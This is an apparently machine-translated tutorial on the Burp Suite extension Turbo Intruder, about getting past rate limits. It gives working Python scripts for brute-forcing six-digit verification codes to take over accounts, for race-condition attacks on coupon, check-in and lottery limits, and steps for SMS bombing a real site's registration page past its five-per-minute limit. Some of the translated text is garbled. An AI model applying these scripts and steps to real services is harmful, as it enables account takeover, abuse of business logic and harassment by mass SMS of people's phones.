Title: burpsuit plugin Turbo Intruder: Detailed explanation of breaking through rate limits

1. Introduction to plug-in

TurboIntruder is a Burp Suite extension plugin that sends a large number of HTTP requests and analyzes results, embracing a billion request attack. It is designed to supplement BurpIntruder with attacks that require exception speed, duration, or complexity.

2. Plug-in principle

Use the first request to establish a connection. The subsequent acquisition of resources is to obtain long connections of the resource through this connection. It also uses HTTP pipelines (HTTP Pipelining) to send the request. This method will send the next request while waiting for the response of the previous request. During the sending process, there is no need to wait for the server to respond to the previous request; however, the client still needs to receive the response in the order in which the request is sent. Initiating a request through HTTP pipeline is 6000% of the speed of short connection (Connection: close )

3. Installation method

Install Turbo intuder plug-in in Burp Suite

IV. How to use

Select the packet and right-click to select Send to turbo intruder (the packet must be crawled here. If there is no crawl, the send to tube intruder menu will not be displayed)

At this time, a new window will open. The upper part of the window is the original HTTP request package, the lower part is the operation code, and the middle part can select the specific operation code from the drop-down box according to the scene. Each time it is opened, the default is Last code used, which is the code used last time.

The code area needs to use the "%s" character instead of the part that needs to be Fuzzed. Select the corresponding operation code and click Attack at the bottom to start the attack. For specific usage details, you can combine them with the use scenarios of the third part.

5. Usage scenarios

1. Verification code blast

It mainly appears in mobile phone verification, email verification code login, and password recovery functions. The verification code explosion requires the user name enumeration to achieve the ability to take over any user.

Verification code blasting operation code:

from itertools import product

def brute_veify_code(target, engine, length):

pattern='1234567890' #Iterative objects used to generate dictionary

for i in list(product(pattern, repeat=length)): #product() receives multiple iterative objects and then generates a Cartesian product. The repeat parameter represents the number of iterative objects.

code=''.join(i)

engine.queue(target.req, code)

def queueRequests(target, wordlists):

engine=RequestEngine(endpoint=target.endpoint, #Specify the address of the target

concurrentConnections=30, #Make 30 connections with the server

requestsPerConnection=100, #Send 100 requests at the same time for each connection

pipeline=True #Enable pipeline (HTTP Pipelining) mode

)

brute_veify_code(target, engine, 6) #Modify according to the number of verification code digits

def handleResponse(req, interesting):

if 'error' not in req.response: #Operate response, add "error" to the table

table.add(req)

Demo:

Assume that Baidu wd parameter is a numeric 6-bit verification code. Replace the parameter value with "%s", and then copy the above code to the operation code area

Click Attack to start the attack, you can see that '%s' is replaced with the generated dictionary content. 29431 requests were successfully requested in 31 seconds, with RPS of 949

2. Concurrent testing

Concurrent vulnerabilities are business logic vulnerabilities and exist in functional points that limit the number of times, such as check-in, lottery, coupon collection and other functional points. Use concurrency technology to test to see if the server can respond successfully multiple times.

Operation code for concurrent tests:

def queueRequests(target, wordlists):

engine=RequestEngine(endpoint=target.endpoint,

concurrentConnections=30,

requestsPerConnection=100,

pipeline=False

)

for i in range(30): #Create 30 requests, which need to correspond to concurrentConnections, and send one request for each connection

engine.queue(target.req, target.baseInput, gate='race1') #The "gate" parameter blocks the last byte of each request until openGate is called

#Wait until each "race1" tagged request is ready, and then send the last byte of each request

engine.openGate('race1') #Identify requests belonging to the same concurrent test

engine.complete(timeout=60)

def handleResponse(req, interesting):

table.add(req)

Demo: This code is optional in the plugin /examples/race.py

Since concurrent testing does not require processing of the original request package, you are likely to encounter the following problem. Due to the tool execution process, there must be a '%s' field in the original request package, so you need to add "%s" anywhere in the request package.

3.SMS bombing

I found a user registration page on a website to get the verification code Catch the data packet that sends the verification code We see that the mobile phone number is in the POST parameter, send this data packet to Turbo Intruder Remember to add an X: %s to the request header (%s in turbo is similar to §s§ in burp intruder. Although we do not have iterative variables, %s will be checked when turbo starts) This code is optional in the plug-in /examples/race.py

Concurrently sending data packets, you can see that most of the length of the sending results is 328. 328 means that the successful sending of the plug-in can bypass the limit of sending only 5 SMS messages in a minute, and sending 10 verification codes in a short time in 1 second.